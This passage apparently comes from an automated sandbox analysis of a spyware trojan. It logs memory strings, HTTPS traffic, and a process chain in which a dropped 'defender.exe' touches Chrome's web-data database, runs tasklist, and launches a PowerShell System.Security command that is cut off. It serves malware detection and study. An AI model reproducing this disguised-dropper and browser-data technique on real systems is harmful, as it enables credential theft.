Source: zh-CN.pak.0.dr, fr.pak.0.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled
Source: zh-CN.pak.0.dr, fr.pak.0.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl
Source: zh-CN.pak.0.dr, fr.pak.0.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl
Source: zh-CN.pak.0.dr, fr.pak.0.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist
Source: zh-CN.pak.0.dr, fr.pak.0.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList
Source: zh-CN.pak.0.dr, fr.pak.0.drString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://chromium.dns.nextdns.io
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://cleanbrowsing.org/privacy
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://cleanbrowsing.org/privacyCleanBrowsing
Source: powershell.exe, 0000001A.00000002.1675946104.0000019ACF142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001A.00000002.1675946104.0000019ACF142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001A.00000002.1675946104.0000019ACF142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/Cloudflare
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://developers.google.com/speed/public-dns/privacy
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://developers.google.com/speed/public-dns/privacyGoogle
Source: defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://dns.google/dns-query
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://dns.quad9.net/dns-query
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://dns.quad9.net/dns-querydns.quad9.netdns9.quad9.net9.9.9.9149.112.112.1122620:fe::fe2620:fe::
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://dns.sb/privacy/
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://dns.sb/privacy/DNS.SBhttps://doh.dns.sb/dns-query
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://dns10.quad9.net/dns-query
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://dns10.quad9.net/dns-querydns10.quad9.net9.9.9.10149.112.112.102620:fe::102620:fe::fe:10
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://dns11.quad9.net/dns-query
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://dns11.quad9.net/dns-querydns11.quad9.net9.9.9.11149.112.112.112620:fe::112620:fe::fe:11Pd
Source: defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://dns64.dns.google/dns-query
Source: defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://dnsnl.alekberg.net/dns-query
Source: defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://doh-01.spectrum.com/dns-query
Source: defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://doh-02.spectrum.com/dns-query
Source: defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/adult-filter
Source: defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/family-filter
Source: defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/security-filter
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://doh.cox.net/dns-query
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://doh.cox.net/dns-querydot.cox.net68.105.28.1168.105.28.122001:578:3f::30
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://doh.dns.sb/dns-query
Source: defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://doh.familyshield.opendns.com/dns-query
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://doh.opendns.com/dns-query
Source: defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://doh.quickline.ch/dns-query
Source: defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://doh.xfinity.com/dns-query
Source: explorer.exe, 0000001D.00000000.1779503148.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
Source: powershell.exe, 0000001A.00000002.1675946104.0000019ACF0BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACEF0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000017.00000002.1612107420.0000023AA253C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACE537000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: zh-CN.pak.0.dr, fr.pak.0.drString found in binary or memory: https://myactivity.google.com/
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://nextdns.io/privacy
Source: powershell.exe, 00000017.00000002.1646408112.0000023AB1531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1646408112.0000023AB13EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1612107420.0000023AA2CC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1743397396.0000019ADD86E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1743397396.0000019ADD9B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACF142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://odvr.nic.cz/doh
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://odvr.nic.cz/dohodvr.nic.cz185.43.135.1193.17.47.12001:148f:fffe::12001:148f:ffff::1
Source: powershell.exe, 00000017.00000002.1612107420.0000023AA253C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACEF0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000017.00000002.1612107420.0000023AA253C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACEF0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: explorer.exe, 0000001D.00000000.1779503148.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
Source: fr.pak.0.drString found in binary or memory: https://passwords.google.comCompte
Source: zh-CN.pak.0.drString found in binary or memory: https://passwords.google.comGoogle
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://perfetto.dev/docs/contributing/getting-started#community).
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://perfetto.dev/docs/contributing/getting-started#community).No
Source: zh-CN.pak.0.dr, fr.pak.0.drString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: zh-CN.pak.0.dr, fr.pak.0.drString found in binary or memory: https://policies.google.com/
Source: explorer.exe, 0000001D.00000000.1779503148.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://public.dns.iij.jp/
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://public.dns.iij.jp/IIJ
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://public.dns.iij.jp/dns-query
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://public.dns.iij.jp/dns-queryIijUShttps://nextdns.io/privacyNextDNShttps://chromium.dns.nextdn
Source: fr.pak.0.drString found in binary or memory: https://support.google.com/chrome/a/?p=block_warn
Source: zh-CN.pak.0.dr, fr.pak.0.drString found in binary or memory: https://support.google.com/chrome/answer/6098869
Source: zh-CN.pak.0.dr, fr.pak.0.drString found in binary or memory: https://support.google.com/chromebook?p=app_intent
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000001D.00000000.1776329895.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 0000001D.00000000.1779503148.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.cisco.com/c/en/us/about/legal/privacy-full.html
Source: zh-CN.pak.0.drString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.html
Source: fr.pak.0.drString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlG
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.nic.cz/odvr/
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.nic.cz/odvr/CZ.NIC
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071A4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.pollensense.com/
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.quad9.net/home/privacy/
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.quad9.net/home/privacy/Quad9
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723

System Summary

barindex
Drops large PE files
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile dump: defender.exe.0.dr 162041856Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile dump: defender.exe0.0.dr 162041856Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeProcess token adjusted: SecurityJump to behavior
Source: defender.exe0.0.drStatic PE information: Number of sections : 16 > 10
Source: libEGL.dll.0.drStatic PE information: Number of sections : 12 > 10
Source: defender.exe.0.drStatic PE information: Number of sections : 16 > 10
Source: libGLESv2.dll.0.drStatic PE information: Number of sections : 12 > 10
Source: libGLESv2.dll0.0.drStatic PE information: Number of sections : 12 > 10
Source: vk_swiftshader.dll.0.drStatic PE information: Number of sections : 12 > 10
Source: vulkan-1.dll.0.drStatic PE information: Number of sections : 12 > 10
Source: libEGL.dll0.0.drStatic PE information: Number of sections : 12 > 10
Source: ffmpeg.dll0.0.drStatic PE information: Number of sections : 11 > 10
Source: ffmpeg.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engineClassification label: mal60.spyw.winEXE@29/139@9/7
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.dbJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2508:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2848:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5876:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsmF81A.tmpJump to behavior
Source: SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe "C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeProcess created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; 